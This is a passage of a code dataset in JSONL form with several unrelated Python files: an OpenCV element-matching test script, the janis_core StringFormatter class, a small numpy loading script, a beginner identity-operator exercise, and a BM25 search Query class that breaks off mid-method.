elements_coord[eid] != [(0, 0), (0, 0)]:\n all_pages = all_pages.intersection(pages[eid])\n\n if len(all_pages) == 1:\n current_page = all_pages.pop()\n return current_page\n else:\n print(\"There are more than 1 page with the same 
elements\")\n\n\ndef load_functions(file_name):\n functions = dict()\n\n # added lower\n with open(file_name, \"r\") as input_file:\n for line in input_file:\n string_list = [s for s in re.split(' |, |,|\\(|\\)', line) if s != '' and s != '\\n']\n functions[string_list[0], string_list[1]] = string_list[2:]\n\n print(functions)\n return functions\n\n\ndef load_elements(path, type):\n elements = {}\n images_path = os.path.join(path, '*' + type)\n # added .lower()\n for file in glob.glob(images_path): # ex: 'Assets/elements/*png'\n id = file[file.rfind('\\\\') + 1: file.find('.' + type)] # for windows change find \\ and for linux find /\n elements[id] = cv2.imread(file)\n\n return elements\n\n\ndef get_elements_color_diff(elements, elements_coord, screenshot):\n elements_color_diff = dict()\n\n for eid in elements.keys():\n if elements_coord[eid] != None:\n coord_image = screenshot[elements_coord[eid][0][1]:elements_coord[eid][1][1],\n elements_coord[eid][0][0]:elements_coord[eid][1][0]]\n avg1 = cv2.mean(elements[eid])[0:3]\n avg2 = cv2.mean(coord_image)[0:3]\n elements_color_diff[eid] = color_diff(avg1, avg2)\n\n return elements_color_diff\n\n\ndef get_elements_coordinates(elements, screenshot, threshold):\n screenshot_gray = cv2.cvtColor(screenshot, cv2.COLOR_BGR2GRAY)\n\n elements_coord = dict()\n\n for eid in elements.keys():\n template = cv2.cvtColor(elements[eid], cv2.COLOR_BGR2GRAY)\n (startX, startY, endX, endY) = find_element(screenshot_gray, template, threshold)\n elements_coord[eid] = [(startX, startY), (endX, endY)]\n\n return elements_coord\n\n\ndef find_element(image, element, threshold=0.9, edge_detection=False, multi_scale=False, visualize=False):\n if multi_scale:\n scales = np.linspace(0.2, 1.0, 20)[::-1]\n else:\n scales = [1]\n\n print('========================== find_elem =====================')\n print(element)\n print('========================== end find_elem =================')\n (tH, tW) = element.shape[:2]\n found = None\n\n for scale in scales:\n\n image_resized = imutils.resize(image, width=int(image.shape[1] * scale))\n r = image.shape[1] / float(image_resized.shape[1])\n\n if image_resized.shape[0] < tH or image_resized.shape[1] < tW:\n break\n\n if edge_detection:\n image_resized = cv2.Canny(image_resized, 50, 200)\n element = cv2.Canny(element, 50, 200)\n\n result = cv2.matchTemplate(image_resized, element, cv2.TM_CCOEFF_NORMED)\n (_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)\n\n if visualize:\n clone = np.dstack([result, result, result])\n cv2.rectangle(clone, (maxLoc[0], maxLoc[1]),\n (maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n cv2.imshow(\"Visualize\", clone)\n cv2.waitKey(0)\n\n if found is None or maxVal > found[0]:\n found = (maxVal, maxLoc, r)\n\n (maxVal, maxLoc, r) = found\n if maxVal > threshold:\n (startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n (endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n else:\n (startX, startY, endX, endY) = (0, 0, 0, 0)\n\n return (startX, startY, endX, endY)\n\n\ndef do_overlap(startX1_startY1, endX1_endY1, startX2_startY2, endX2_endY2):\n startX1, startY1 = startX1_startY1\n endX1, endY1 = endX1_endY1\n startX2, startY2 = startX2_startY2\n endX2, endY2 = endX2_endY2\n\n if startX1 > endX2 or startX2 > endX1 or startY1 > endY2 or startY2 > endY1:\n return False\n\n return True\n\n\ndef color_diff(r1_g1_b1, r2_g2_b2):\n r1, g1, b1 = r1_g1_b1\n r2, g2, b2 = r2_g2_b2\n return np.sqrt((r2 - r1) ** 2 + (g2 - g1) ** 2 + (b2 - b1) ** 
2)\n","repo_name":"Katzuno/BACKEND-Automation-Testing-with-Computer-Vision","sub_path":"elements_bkp.py","file_name":"elements_bkp.py","file_ext":"py","file_size_in_byte":12422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"86553305842","text":"from typing import Optional, List, Dict, Tuple\n\nfrom janis_core.types import String, AnyType\nfrom janis_core.utils import first_value\nfrom janis_core.operators.logical import Operator, AddOperator\nfrom janis_core.utils.bracketmatching import get_keywords_between_braces\nfrom janis_core.utils.errors import (\n TooManyArgsException,\n IncorrectArgsException,\n InvalidByProductException,\n ConflictingArgumentsException,\n)\nfrom janis_core.utils.logger import Logger\nfrom janis_core import settings\n\nclass StringFormatter(Operator):\n \"\"\"\n A StringFormatter is used to allow inputs or other values to be inserted at runtime into a string template. A StringFormatter can be concatenated with Python strings, another StringFormatter or an InputSelector.\n\n The string \"{placeholdername}\" can be used within a string format, where placeholdername is a kwarg passed to the StringFormatter with the intended selector or value.\n\n The placeholder names must be valid Python variable names (as they’re passed as kwargs). See the String formatter tests for more examples.\n\n eg:\n ToolInput('greeting', String, default='Hello')\n ToolInput('username', String, default='Grace')\n \n StringFormatter(\"Hello, {name}\", name=InputSelector(\"username\"))\n >\"Hello, Grace\"\n\n \"Hello, \" + InputSelector(\"username\")\n >\"Hello, Grace\"\n\n InputSelector(\"greeting\") + StringFormatter(\", {name}\", name=InputSelector(\"username\"))\n >\"Hello, Grace\"\n\n \"\"\"\n def returntype(self):\n return String()\n\n def argtypes(self):\n return [String, Optional[AnyType]]\n\n @staticmethod\n def friendly_signature():\n return \"String, **kwargs -> String\"\n\n def validate(self, perform_typecheck=False):\n return True\n\n def __init__(self, format: str, **kwargs):\n super().__init__([])\n # ignore super().__init__ call\n self._format: str = format\n\n keywords, balance = get_keywords_between_braces(self._format)\n\n if balance > 0:\n Logger.warn(\n \"There was an imbalance of braces in the string _format, this might cause issues with concatenation\"\n )\n\n skwargs = set(kwargs.keys())\n\n if settings.validation.VALIDATE_STRINGFORMATTERS:\n if not keywords == skwargs:\n # what's the differences\n if not keywords.issubset(skwargs):\n raise IncorrectArgsException(\n \"The _format required additional arguments to be provided by \"\n \"**kwargs, requires the keys:\" + \", \".join(keywords - skwargs)\n )\n else:\n raise TooManyArgsException(\n \"The **kwargs contained unrecognised keys: \"\n + \", \".join(skwargs - keywords)\n )\n\n self.kwargs = kwargs\n\n resolved_types = [str, int, float]\n\n def to_cwl(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_wdl(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_nextflow(self, unwrap_operator, *args):\n raise Exception(\"Don't use this method\")\n\n def to_python(self, unwrap_operator, *args):\n f = self._format\n for k, v in self.kwargs.items():\n f = f.replace(f\"{{{str(k)}}}\", unwrap_operator(v))\n return f\n\n def evaluate(self, inputs):\n resolvedvalues = {\n k: self.evaluate_arg(v, inputs) for k, v in self.kwargs.items()\n }\n\n values_that_are_lists = {\n k: v for k, v in 
resolvedvalues.items() if isinstance(v, list)\n }\n\n inp_combinations: List[dict] = [{}]\n\n if len(values_that_are_lists) > 0:\n l = len(first_value(values_that_are_lists))\n list_values_that_are_different = sum(\n 0 if len(v) == l else 1 for v in values_that_are_lists.values()\n )\n\n if list_values_that_are_different == 0:\n # dot product\n inp_combinations = [\n {k: v[i] for k, v in values_that_are_lists.items()}\n for i in range(l)\n ]\n elif list_values_that_are_different == 1:\n # cross product\n inp_combinations = self.generate_combinations_of_input_dicts(\n values_that_are_lists=list(values_that_are_lists.items())\n )\n else:\n l_lengths = \", \".join(\n f\"{k}={len(v)}\" for k, v in values_that_are_lists.items()\n )\n raise Exception(\n \"String Formatter evaluation doesn't support scattering for lists of \"\n \"different lengths: \" + l_lengths\n )\n\n evaluated_combinations = [\n self.resolve_with_resolved_values(**{**resolvedvalues, **c})\n for c in inp_combinations\n ]\n if len(evaluated_combinations) == 0:\n raise Exception(\n \"Something happened when resolving inputs with input values \"\n + str(inputs)\n )\n elif len(evaluated_combinations) == 1:\n return evaluated_combinations[0]\n else:\n return evaluated_combinations\n\n def rewrite_operator(self, args_to_rewrite: dict):\n return self.__class__(\n self._format, **self.substitute_arg(args_to_rewrite, self.kwargs)\n )\n\n @staticmethod\n def generate_combinations_of_input_dicts(\n values_that_are_lists: List[Tuple[str, List[any]]]\n ) -> List[Dict]:\n\n if len(values_that_are_lists) == 0:\n return []\n key = values_that_are_lists[0][0]\n values = values_that_are_lists[0][1]\n\n if len(values_that_are_lists) == 1:\n return [{key: v} for v in values]\n\n combinations = []\n for v in values:\n for c in StringFormatter.generate_combinations_of_input_dicts(\n values_that_are_lists[1:]\n ):\n combinations.append({**c, key: v})\n\n return combinations\n\n def __repr__(self):\n val = self._format\n for k, v in self.kwargs.items():\n val = val.replace(f\"{{{k}}}\", f\"{{{str(v)}}}\")\n return val\n\n def get_leaves(self):\n leaves = []\n for a in self.kwargs.values():\n if isinstance(a, Operator):\n leaves.extend(a.get_leaves())\n else:\n leaves.append(a)\n return leaves\n\n def resolve_with_resolved_values(self, **resolved_values):\n\n s1 = set(self.kwargs.keys())\n actual_keys, _ = get_keywords_between_braces(self._format)\n if s1 != actual_keys:\n diff = (actual_keys - s1).union(s1 - actual_keys)\n\n raise Exception(\n \"The format for the string builder has changed since runtime, or an internal error has\"\n \" occurred. The following keys did not appear in both sets: \"\n + \", \".join(diff)\n )\n\n s2 = set(resolved_values.keys())\n\n missing_keys = s1 - s2\n if len(missing_keys) > 0:\n raise IncorrectArgsException(\n \"There were missing parameters when formatting string: \"\n + \", \".join(missing_keys)\n )\n\n unresolved_values = [\n f\"{r} ({type(resolved_values[r]).__name__})\"\n for r in resolved_values\n if not any(\n isinstance(resolved_values[r], t)\n for t in StringFormatter.resolved_types\n )\n ]\n if len(unresolved_values) > 0:\n raise ValueError(\n \"There were unresolved parameters when formatting string: \"\n + \", \".join(unresolved_values)\n )\n\n retval = self._format\n for k in resolved_values:\n retval = retval.replace(f\"{{{k}}}\", str(resolved_values[k]))\n return retval\n
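\n # A tiny resolution sketch (illustrative only, with made-up keys): for a\n # formatter built as StringFormatter('{a}.{ext}', a=..., ext=...), calling\n # resolve_with_resolved_values(a='reads', ext='bam') returns 'reads.bam';\n # unknown keys or non-str/int/float values raise the exceptions above.\n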
\n def __radd__(self, other):\n return StringFormatter(other) + self\n\n def __add__(self, other):\n from janis_core.operators.selectors import InputSelector\n\n if isinstance(other, str):\n # check if it has args in it\n keywords, _ = get_keywords_between_braces(other)\n if len(keywords) > 0:\n invalidkwargs = [k for k in keywords if k not in self.kwargs]\n if len(invalidkwargs) > 0:\n raise InvalidByProductException(\n f\"The string to be concatenated contained placeholder(s) ({', '.join(invalidkwargs)}) \"\n f\"that were not in the original StringFormatter\"\n )\n return self._create_new_formatter_from_strings_and_args(\n [self._format, other], **self.kwargs\n )\n\n elif isinstance(other, InputSelector):\n return self + other.to_string_formatter()\n\n elif isinstance(other, StringFormatter):\n # check if args overlap and they're different\n s1 = set(self.kwargs.keys())\n s2 = set(other.kwargs.keys())\n intersection = s1.intersection(s2)\n\n if len(intersection) > 0:\n not_same_args = [\n k for k in intersection if self.kwargs[k] != other.kwargs[k]\n ]\n if len(not_same_args) > 0:\n raise ConflictingArgumentsException(\n f\"Couldn't concatenate formats as there are keys ({', '.join(not_same_args)}) \"\n f\"that were not equal between formatters \"\n )\n\n # yeah we sweet\n new_args = {**self.kwargs, **other.kwargs}\n return StringFormatter._create_new_formatter_from_strings_and_args(\n [self._format, other._format], **new_args\n )\n\n @staticmethod\n def _create_new_formatter_from_strings_and_args(strings: [str], **kwargs):\n new_format = \"\".join(strings)\n try:\n return StringFormatter(new_format, **kwargs)\n except IncorrectArgsException as e:\n new_params = set(\n get_keywords_between_braces(new_format)[0] - set(kwargs.keys())\n )\n raise InvalidByProductException(\n f\"Joining the input files (to '{new_format}') created the new params: \"\n + \", \".join(new_params)\n )\n\n def to_string_formatter(self):\n return self\n","repo_name":"PMCC-BioinformaticsCore/janis-core","sub_path":"janis_core/operators/stringformatter.py","file_name":"stringformatter.py","file_ext":"py","file_size_in_byte":10504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"73592218352","text":"# Custom files\nimport outputs\n\nimport tout\n\n\n\nimport sys\nimport os\nimport numpy as np\n\n\npath = sys.argv[1]\nos.chdir(path)\nprint('Accessing directory: ', os.getcwd())\n\ndef reconstruct_timestep():\n final_timestep = []\n final_timestep.append(np.load('gal.npy'))\n final_timestep.append(np.load('gas.npy'))\n final_timestep.append(np.load('new.npy'))\n final_timestep.append(np.load('old.npy'))\n return final_timestep\n
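\n# An illustrative note (sketch, assuming the four .npy files exist): the list\n# returned above can be unpacked as gal, gas, new, old = reconstruct_timestep()\n# for further analysis.\n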
\ndef main():\n # Imports everything and makes spatial plot if necessary\n # Final time step should be a 3D array containing gal, gas, new & old\n if outputs.run_tout == True:\n\n file_exists = os.path.exists('timestep.npy')\n print('file exists? ',file_exists)\n\n if outputs.run_from_file == False or file_exists == False: \n tout.run_tout()\n \n else: # Used for debugging & testing\n print('running from file')\n reconstruct_timestep()\n \n\n \n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"madeleine-mckenzie/mPhys","sub_path":"project_2/Analysis_scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"799283232","text":"# a = 20\n# b = 20\n\n# if ( a is b ):\n# print (\"Line 1 - a and b have same identity\")\n# else:\n# print (\"Line 1 - a and b do not have same identity\")\n\n# if ( id(a) == id(b) ):\n# print (\"Line 2 - a and b have same identity\")\n# else:\n# print (\"Line 2 - a and b do not have same identity\")\n\n# b = 30\n# if ( a is b ):\n# print (\"Line 3 - a and b have same identity\")\n# else:\n# print (\"Line 3 - a and b do not have same identity\")\n\n# if ( a is not b ):\n# print (\"Line 4 - a and b do not have same identity\")\n# else:\n# print (\"Line 4 - a and b have same identity\")\n\n\n# x = 20\n# y = 30\n\n# print(x is y)\n\n# y = x\n# print(x is y)\n\nimport random\nb = ''\nrandom_four = random.randrange(1,100)\nfor n in range(4):\n\n n = random.randint(1,9)\n n = str(n)\n b += n \n print(n)\nprint(b)","repo_name":"Anosike-CK/class_code","sub_path":"Identity_Operators.py","file_name":"Identity_Operators.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"18496403175","text":"\"\"\"\n------------------------------------------------------------\nAuthor: Leo LI\nDate: 10th Feb 2023\nDescription: Responsible for retrieving results for different\ntypes of queries\n------------------------------------------------------------\n\"\"\"\nimport math\nimport Util\n\n\nclass Query:\n \"\"\"\n Class handling the query request and providing APIs\n \"\"\"\n def __init__(self, dataset):\n self.__dataset = dataset.get_data()\n self.__index_general = dataset.get_index()\n self.__index_title = dataset.get_index_title()\n self.__index_keyword = dataset.get_index_keywords()\n self.__index_genre = dataset.get_index_genre()\n self.__index_language = dataset.get_index_language()\n self.__average_number_of_terms = self.__cal_average_number_of_terms()\n self.__number_of_docs = len(self.__dataset.keys())\n self.__stop_words = dataset.get_stop_words()\n self.__number_of_terms_dict = {}\n for docid in self.__dataset:\n self.__number_of_terms_dict[docid] = self.__number_of_terms(docid)\n\n # providing util method for proper pickling\n def __getstate__(self):\n return {\n \"dataset\": self.__dataset,\n \"index_general\": self.__index_general,\n \"index_title\": self.__index_title,\n \"index_keyword\": self.__index_keyword,\n \"index_genre\": self.__index_genre,\n \"index_language\": self.__index_language,\n \"average_number_of_terms\": self.__average_number_of_terms,\n \"number_of_docs\": self.__number_of_docs,\n \"stop_words\": self.__stop_words,\n \"number_of_terms\": self.__number_of_terms_dict\n }\n\n def __setstate__(self, state):\n self.__dataset = state[\"dataset\"]\n self.__index_general = state[\"index_general\"]\n self.__index_title = state[\"index_title\"]\n self.__index_keyword = 
state[\"index_keyword\"]\n self.__index_genre = state[\"index_genre\"]\n self.__average_number_of_terms = state[\"average_number_of_terms\"]\n self.__number_of_docs = state[\"number_of_docs\"]\n self.__stop_words = state[\"stop_words\"]\n self.__index_language = state[\"index_language\"]\n self.__number_of_terms_dict = state[\"number_of_terms\"]\n\n def by_title(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by title\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Raises:\n Exception: If keywords is empty\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"title\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"title\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_keywords(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by keywords\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"keywords\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"keywords\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_genres(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by genre\n\n Args:\n keywords: String -> query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"genre\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"genre\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_language(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Search by language\n\n Args:\n keywords: String - query contents\n year1: Integer -> year filter - published later than...\n 
year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower(), \"language\")\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower(), \"language\")\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def by_general(self, keywords, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Perform general queries\n\n Args:\n keywords: String - query contents\n year1: Integer -> year filter - published later than...\n year2: Integer -> year filter - published earlier than...\n not_ranking: Bool -> switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n keywords = keywords.split()\n # if search for a single word\n if len(keywords) == 1:\n result = self.__plain_search(keywords[0].lower())\n else:\n for keyword in keywords:\n result += self.__plain_search(keyword.lower())\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking(keywords, result)\n\n def __filter_year(self, year, position, docids):\n \"\"\"\n Method to filter the result by year\n\n Args:\n year: Integer -> representing the date\n position: Integer -> Direction of the filter, 1 represent find result later than \"year\", otherwise earlier\n docids: List -> A list of docids\n\n Returns:\n List -> A list of docids filtered\n \"\"\"\n result = []\n if position == 1:\n for docid in docids:\n if self.__dataset[docid][\"year\"]:\n if int(self.__dataset[docid][\"year\"]) > year:\n result.append(docid)\n else:\n for docid in docids:\n if self.__dataset[docid][\"year\"]:\n if int(self.__dataset[docid][\"year\"]) < year:\n result.append(docid)\n return result\n\n def __plain_search(self, word_to_be_queried, attributes=None):\n \"\"\"\n Method to perform plain single word search\n\n Args:\n word_to_be_queried: String -> the word to be queried\n attributes: String -> which area to be queried (e.g. 
\"title\"), perform a general query if it's None\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n # Detect if the search is specified to an attribute\n if attributes:\n if attributes == \"title\":\n if word_to_be_queried in self.__index_title:\n for docid, position in self.__index_title[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"keywords\":\n if word_to_be_queried in self.__index_keyword:\n for docid, position in self.__index_keyword[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"genre\":\n if word_to_be_queried in self.__index_genre:\n for docid, position in self.__index_genre[word_to_be_queried][1].items():\n result.append(docid)\n if attributes == \"language\":\n if word_to_be_queried in self.__index_language:\n for docid, position in self.__index_language[word_to_be_queried][1].items():\n result.append(docid)\n # Use general research if no attribute input \n else:\n if word_to_be_queried in self.__index_general:\n for docid, position in self.__index_general[word_to_be_queried][1].items():\n result.append(docid)\n stemmed = Util.stem_data(word_to_be_queried)\n punctuationRemoved1 = Util.remove_punctuation(word_to_be_queried, True)\n punctuationRemoved2 = Util.remove_punctuation(word_to_be_queried)\n if stemmed in self.__index_general:\n for docid, position in self.__index_general[stemmed][1].items():\n result.append(docid)\n if punctuationRemoved1 in self.__index_general:\n for docid, position in self.__index_general[punctuationRemoved1][1].items():\n result.append(docid)\n if punctuationRemoved2 in self.__index_general:\n for docid, position in self.__index_general[punctuationRemoved2][1].items():\n result.append(docid)\n return list(dict.fromkeys(result))\n\n def __position_search(self, word_to_be_queried, attribute=None):\n \"\"\"\n Method to direct perform single word search with docid\n\n Args:\n word_to_be_queried: String -> the word to be queried\n attribute: String -> which area to be queried (e.g. 
\"title\"), perform a general query if it's None\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = {}\n stemmed = Util.stem_data(word_to_be_queried)\n punctuationRemoved1 = Util.remove_punctuation(word_to_be_queried, True)\n punctuationRemoved2 = Util.remove_punctuation(word_to_be_queried)\n if attribute is None:\n search_field = self.__index_general\n elif attribute == \"title\":\n search_field = self.__index_title\n elif attribute == \"keywords\":\n search_field = self.__index_keyword\n elif attribute == \"genre\":\n search_field = self.__index_genre\n elif attribute == \"language\":\n search_field = self.__index_language\n if word_to_be_queried in search_field:\n for docid, position in search_field[word_to_be_queried][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if stemmed in search_field:\n for docid, position in search_field[stemmed][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if punctuationRemoved1 in search_field:\n for docid, position in search_field[punctuationRemoved1][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n if punctuationRemoved2 in search_field:\n for docid, position in search_field[punctuationRemoved2][1].items():\n position_list = [x for x in position if x.isnumeric()]\n if position_list:\n if docid not in result:\n result[docid] = position_list\n else:\n result[docid] += position_list\n # remove duplicate\n for key in result:\n new_list = []\n for item in result[key]:\n if item not in new_list:\n new_list.append(item)\n result[key] = new_list\n return result\n\n def phrase_search_handler(self, keywords, year1=None, year2=None, not_ranking=False, attribute=None, is_list=False):\n \"\"\"\n Entry for perform a new query, handling the phrase search\n\n Args:\n keywords: String -> query contents\n year1: Integer -> Year filter - published later than...\n year2: Integer -> Year filter - published earlier than...\n not_ranking: Bool -> Switch for applying BM25 ranking\n attribute: String -> which area to be queried (e.g. 
\"title\"), perform a general query if it's None\n is_list: Bool -> if the keywords is passed in as a list of words, used for recursive call\n\n Returns:\n List -> A list of relevant docids\n\n Raises:\n Exception: If keywords is empty\n \"\"\"\n result = []\n if keywords:\n # remove \" in the beginning and the ending\n if not is_list:\n if not Util.is_phrase_search(keywords):\n if attribute is None:\n return self.by_general(keywords, year1, year2, not_ranking)\n elif attribute == \"title\":\n return self.by_title(keywords, year1, year2, not_ranking)\n elif attribute == \"keywords\":\n return self.by_keywords(keywords, year1, year2, not_ranking)\n elif attribute == \"genre\":\n return self.by_genres(keywords, year1, year2, not_ranking)\n elif attribute == \"language\":\n return self.by_language(keywords, year1, year2, not_ranking)\n keywords = keywords.split()\n keywords[0] = keywords[0][1:]\n keywords[len(keywords) - 1] = keywords[len(keywords) - 1][:-1]\n for i in range(1, len(keywords)):\n if i == 1:\n result += self.proximity_search(keywords[i - 1].lower(), keywords[i].lower(), 1, True, attribute,\n False, None, None, True)\n else:\n new_result = self.proximity_search(keywords[i - 1].lower(), keywords[i].lower(), 1, True, attribute,\n False, None, None, True)\n result = list(set(result) & set(new_result))\n if not result:\n break\n print(\"1st res: \", result)\n if not is_list:\n keywords_plot = Util.remove_stop_words(keywords, self.__stop_words)\n result += self.phrase_search_handler(keywords_plot, year1, year2, not_ranking, attribute, True)\n result = list(dict.fromkeys(result))\n else:\n raise Exception(\"Keywords is empty!\")\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return list(dict.fromkeys(self.bm25_ranking(keywords, result)))\n\n def proximity_search(self, word1, word2, distance, phrase_search=False, attribute=None,\n direct_call=False, year1=None, year2=None, not_ranking=False):\n \"\"\"\n Method to perform proximity search\n\n Args:\n word1: String -> first word to be queried\n word2: String -> second word to be queried\n distance: Integer -> distance between the two words\n phrase_search: Bool -> is this a phrase search\n attribute: String -> which area to be queried (e.g. 
\"title\"), perform a general query if it's None\n direct_call: Bool -> if the method is directly called by the frontend\n year1: Integer -> Year filter - published later than...\n year2: Integer -> Year filter - published earlier than...\n not_ranking: Bool -> Switch for applying BM25 ranking\n\n Returns:\n List -> A list of relevant docids\n \"\"\"\n result = []\n if word1 and word2 and distance is not None:\n word1_result = self.__position_search(word1, attribute)\n word2_result = self.__position_search(word2, attribute)\n common_result = set(word1_result.keys()) & set(word2_result.keys())\n # print(\"gogogo\", common_result)\n if common_result:\n for docid in common_result:\n # print(\"docid: \", docid)\n position_1 = word1_result[docid]\n # print(word1, \" : \", position_1)\n position_2 = word2_result[docid]\n # print(word2, \" : \", position_2)\n positions = position_1 + position_2\n # print(\"Merge: \", positions)\n if phrase_search:\n for i in range(len(position_1)):\n for j in range(len(position_1), len(positions)):\n # print(\"position at the doc: \", positions[i], int(positions[j]))\n if int(positions[i]) - int(positions[j]) == -1 or \\\n int(positions[i]) - int(positions[j]) == 0:\n result.append(docid)\n else:\n for i in range(len(position_1)):\n for j in range(len(position_1), len(positions)):\n if abs(int(positions[i]) - int(positions[j])) <= distance:\n result.append(docid)\n # print(\"result: \", result)\n if direct_call:\n if year1:\n result = self.__filter_year(year1, 1, result)\n if year2:\n result = self.__filter_year(year2, 2, result)\n if not_ranking:\n return result\n return self.bm25_ranking([word1, word2], result)\n return result\n\n def __term_frequency(self, word_to_be_queried, docid):\n \"\"\"\n Compute the term frequency for a token in a specific document\n\n Args:\n word_to_be_queried: String -> the token to be proceed\n docid: Integer -> the document id\n\n Returns:\n Integer -> term frequency\n \"\"\"\n appearance_in_cast = 0\n appearance_in_title = 0\n appearance_in_spot = 0\n appearance_in_keywords = 0\n if docid in self.__index_general[word_to_be_queried][1]:\n for position in self.__index_general[word_to_be_queried][1][docid]:\n if position.isnumeric():\n if int(position) < 100:\n appearance_in_title += 1\n elif int(position) > 1000000:\n appearance_in_cast += 1\n elif int(position) > 500:\n appearance_in_spot += 1\n elif position == \"keyword\":\n appearance_in_keywords += 1\n return (len(self.__index_general[word_to_be_queried][1][docid]) - appearance_in_cast * 0.5 +\n appearance_in_title * 3.5 + appearance_in_spot * 1.8 + appearance_in_keywords * 2.3)\n else:\n return 0\n\n def __document_frequency(self, word_to_be_queried):\n \"\"\"\n Compute the document frequency for a token\n\n Args:\n word_to_be_queried: String -> the token to be proceed\n\n Returns:\n Integer -> document freqhency\n \"\"\"\n return len(self.__index_general[word_to_be_queried][1])\n\n def __cal_average_number_of_terms(self):\n \"\"\"\n Calculate the average number of terms included in each document\n\n Args:\n n/a\n\n Returns:\n Integer -> the average number of terms included in each document\n \"\"\"\n number_of_tokens = 0\n for docid, info in self.__dataset.items():\n for attribute, token in info.items():\n if token is not None:\n number_of_tokens += len(token)\n return number_of_tokens / len(self.__dataset)\n\n def __number_of_terms(self, docid):\n \"\"\"\n Compute the number of terms appeared in a specific document\n\n Args:\n docid: Integer -> the document to be 
